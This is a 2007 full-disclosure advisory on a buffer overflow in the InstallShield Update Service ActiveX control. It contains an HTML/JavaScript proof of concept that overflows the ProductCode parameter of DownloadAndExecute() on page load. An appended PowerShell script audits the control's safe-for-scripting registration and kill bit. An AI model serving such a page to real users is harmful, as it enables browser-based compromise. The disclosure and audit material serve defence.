
installshield-overflow.txt

Posted on 25 December 2007

The InstallShield Update Service Web Agent version 5.1.100.47363 suffers from an exploitable buffer overflow in the ProductCode parameter of the DownloadAndExecute() function. This object is marked safe for scripting. Note that this issue appears to be different from http://www.securityfocus.com/bid/26280 (the iDefense advisory seems to be talking about insecure methods); however, the patch referenced in that issue fixes this issue as well, since the update renders this object unsafe for scripting.

PoC as follows:

```html
<!-- written by e.b. -->
<html>
<head>
<script language="JavaScript" DEFER>
function Check() {
  // build an over-long string for the ProductCode parameter
  var s = 'A';
  while (s.length <= 12000) s = s + 'A';
  obj.Initialize("", "", "", "");
  obj.DownloadAndExecute("", s, 0, "", "");
}
</script>
</head>
<body onload="JavaScript: return Check();">
<object id="obj" classid="clsid:E9880553-B8A7-4960-A668-95C68BED571E" />
</object>
</body>
</html>
```

Elazar

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
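The post's point is that the control is marked safe for scripting and that the vendor patch removes that marking. The following PowerShell check, added here and not part of the original post or of the InstallShield product, reports whether the control with the CLSID from the PoC is still registered, whether it is declared safe for scripting or initializing via COM component categories, and whether the Internet Explorer kill bit has been set for it; the function name and output layout are my own.

```powershell
# Added example: audit the registration state of the ActiveX control named in
# the advisory. CLSID taken from the PoC above (registry form needs braces).
$Clsid = '{E9880553-B8A7-4960-A668-95C68BED571E}'

# Component categories a control registers to be treated as safe by IE.
$CatSafeForScripting    = '{7DD95801-9882-11CF-9FA9-00AA006C42C4}'
$CatSafeForInitializing = '{7DD95802-9882-11CF-9FA9-00AA006C42C4}'
$KillBit = 0x400   # "Compatibility Flags" bit that makes IE refuse to load it

function Get-ActiveXSafetyStatus {
    param([Parameter(Mandatory)][string]$Clsid)

    $regClsid = "Registry::HKEY_CLASSES_ROOT\CLSID\$Clsid"
    $cats     = "$regClsid\Implemented Categories"
    $compat   = "HKLM:\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\$Clsid"

    $result = [ordered]@{
        Clsid               = $Clsid
        Registered          = Test-Path $regClsid
        Server              = $null
        SafeForScripting    = Test-Path "$cats\$CatSafeForScripting"
        SafeForInitializing = Test-Path "$cats\$CatSafeForInitializing"
        KillBitSet          = $false
    }

    if ($result.Registered) {
        # DLL that implements the control; useful for checking its file version
        $srv = Get-ItemProperty "$regClsid\InprocServer32" -ErrorAction SilentlyContinue
        if ($srv) { $result.Server = $srv.'(default)' }
    }
    if (Test-Path $compat) {
        $flags = (Get-ItemProperty $compat -ErrorAction SilentlyContinue).'Compatibility Flags'
        if ($null -ne $flags) { $result.KillBitSet = [bool]($flags -band $KillBit) }
    }
    [pscustomobject]$result
}

Get-ActiveXSafetyStatus -Clsid $Clsid | Format-List
```

A control can also assert safety at runtime through IObjectSafety rather than through registry categories, so a clean category result alone does not prove the control is unscriptable; the kill bit is the setting that stops IE instantiating it regardless.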

